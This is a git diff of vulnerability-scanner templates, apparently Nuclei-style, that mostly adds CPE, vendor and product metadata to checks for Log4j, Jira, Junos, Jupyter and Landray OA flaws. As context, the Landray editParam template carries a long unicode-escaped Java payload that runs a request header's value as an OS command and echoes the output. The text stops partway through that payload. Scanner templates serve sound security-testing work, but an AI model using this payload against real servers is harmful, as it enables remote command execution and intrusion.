diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index 4a5e617378..42a1ce07fe 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -16,10 +16,13 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-77 + cpe: cpe:2.3:a:jamf:self_service:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"JamF" + product: self_service + vendor: jamf tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/jira/jira-servicedesk-signup.yaml b/http/vulnerabilities/jira/jira-servicedesk-signup.yaml index 2397b0088d..dc2788d2b4 100644 --- a/http/vulnerabilities/jira/jira-servicedesk-signup.yaml +++ b/http/vulnerabilities/jira/jira-servicedesk-signup.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-287 + cpe: cpe:2.3:a:atlassian:jira_service_management:*:*:*:*:*:*:*:* metadata: max-request: 4 shodan-query: http.component:"Atlassian Jira" + product: jira_service_management + vendor: atlassian tags: atlassian,servicedesk,jira,confluence http: diff --git a/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml b/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml index 9c8b53b72a..6bc535f2dc 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + product: jira + vendor: atlassian tags: atlassian,jira + classification: + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml index 8628c41074..e569b2817d 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + product: jira + vendor: atlassian tags: atlassian,jira + classification: + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml index be696309db..7c8c092ec8 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + product: jira_data_center + vendor: atlassian tags: atlassian,jira + classification: + cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml index 0a88ec36aa..2fc6131f5d 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + product: jira_data_center + vendor: atlassian tags: atlassian,jira + classification: + cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/vulnerabilities/juniper/junos-xss.yaml b/http/vulnerabilities/juniper/junos-xss.yaml index 65691a796e..1ee53bcc2e 100644 --- a/http/vulnerabilities/juniper/junos-xss.yaml +++ b/http/vulnerabilities/juniper/junos-xss.yaml @@ -11,8 +11,12 @@ info: max-request: 2 shodan-query: title:"Juniper Web Device Manager" fofa-query: title="Juniper Web Device Manager" + product: junos + vendor: juniper tags: junos,xss + classification: + cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* variables: string: "{{to_lower(rand_base(2))}}" @@ -48,4 +52,4 @@ http: - "" - "wrapper for" condition: and -# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/jupyter-notebook-rce.yaml b/http/vulnerabilities/jupyter-notebook-rce.yaml index 374daf07c9..e305b6c725 100644 --- a/http/vulnerabilities/jupyter-notebook-rce.yaml +++ b/http/vulnerabilities/jupyter-notebook-rce.yaml @@ -14,8 +14,12 @@ info: shodan-query: title:"jupyter notebook" fofa-query: title="jupyter notebook" zoomeye-query: title:"jupyter notebook" + product: notebook + vendor: jupyter tags: jupyter,notebook,rce,bypass + classification: + cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/vulnerabilities/landray/landray-eis-sqli.yaml b/http/vulnerabilities/landray/landray-eis-sqli.yaml index 0a629733d3..9f53e558aa 100644 --- a/http/vulnerabilities/landray/landray-eis-sqli.yaml +++ b/http/vulnerabilities/landray/landray-eis-sqli.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: app="Landray-OA系统" + product: landray_office_automation + vendor: landray tags: landray,eims,sqli + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - "Microsoft SQL Server" - "SqlException" condition: and -# digest: 4a0a00473045022100926fe7b0a4fb4e4270d3639b217676718075b3110d9568994f28c2ebd409fc58022010ad57c7f0121868d177390eb364af1e919389abc1094d73e26b94a1a5ef00c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100926fe7b0a4fb4e4270d3639b217676718075b3110d9568994f28c2ebd409fc58022010ad57c7f0121868d177390eb364af1e919389abc1094d73e26b94a1a5ef00c6:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml index 51c3faf756..08ec9af8fe 100644 --- a/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml @@ -13,8 +13,12 @@ info: max-request: 1 fofa-query: app="Landray-OA系统" hunter-query: web.body=="蓝凌软件",web.icon=="302464c3f6207d57240649926cfc7bd4" + product: landray_office_automation + vendor: landray tags: landray,oa,dataxml,rce,replaceExtend + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* variables: string: "{{randstr}}" @@ -64,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de7ecf869efb8528fe638e5f4bd1ea14cd0b912aff4dd1d8399178735a538184022100cd9ddac9f7cae0032de5483f093c03d58920819d06593ca15cfeb2e859a82075:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml index 7eb332e40f..5cd1adefe4 100755 --- a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml @@ -12,7 +12,11 @@ info: verified: true max-request: 1 fofa-query: app="Landray-OA系统" + product: landray_office_automation + vendor: landray tags: landray,rce + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* variables: payload: '{"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0054\u0065\u0073\u0074\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u0